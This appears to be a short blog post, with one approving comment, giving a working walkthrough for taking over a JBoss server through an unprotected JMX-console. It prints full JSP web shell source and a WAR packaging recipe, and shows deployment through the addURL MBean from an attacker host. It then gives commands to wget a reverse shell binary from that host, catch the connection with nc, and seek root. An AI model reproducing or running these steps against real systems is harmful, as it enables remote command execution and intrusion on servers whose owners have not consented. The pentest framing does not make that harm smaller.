kekeke..
Step by Step
1) Browse the target machine : http://mytargettest.com:8080
2) Click on the JMX-CONSOLE, if you can see the page, that's great.
3) Now you need to create a war file with our shell.
3.1) mkdir WEB-INF
3.2)vi cmd.jsp and insert this:
<%@ page import="java.util.*,java.io.*"%><%%><HTML><BODY>Commands with JSP<FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%if (request.getParameter("cmd") != null) {out.println("Command: " + request.getParameter("cmd") + "<BR>");Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine();while ( disr != null ) {out.println(disr);disr = dis.readLine();}}%></pre></BODY></HTML>
3.3)vi WEB-INF/web.xml and insert this:
<?xml version="1.0" ?><web-app xmlns="http://java.sun.com/xml/ns/j2ee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://java.sun.com/xml/ns/j2eehttp://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"version="2.4"><servlet><servlet-name>Command</servlet-name><jsp-file>/cmd.jsp</jsp-file></servlet></web-app>
3.4) now you have to compile it : jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest webserver, you will need to download this file to the target machine.
4) Now browse
http://mytargettest.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
5) Search for "void addURL()"
6) Insert the address for your war file , in my case : http://172.16.1.79/exploits/cmd.war and click INVOKE
7) It will take about 1min , then you can browse your application http://mytargettest.com:8080/cmd/cmd.jsp
8) Now you just need to type the commands like.. "id" , if you are not root, then you need to find a exploit to root the machine
9) Meanwhile you can get shell to the machine doing this
10) Download to the machine a reverse shell : wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell
11) chmod +x /tmp/airwolf_reverse_shell
12) prepare your pentest machine to get the reverse shell : nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine : /tmp/airwolf_reverse_shell
14) you are now connected to the server.
Now r0x d4 n3tw0rk
nice one masta =)
ReplyDelete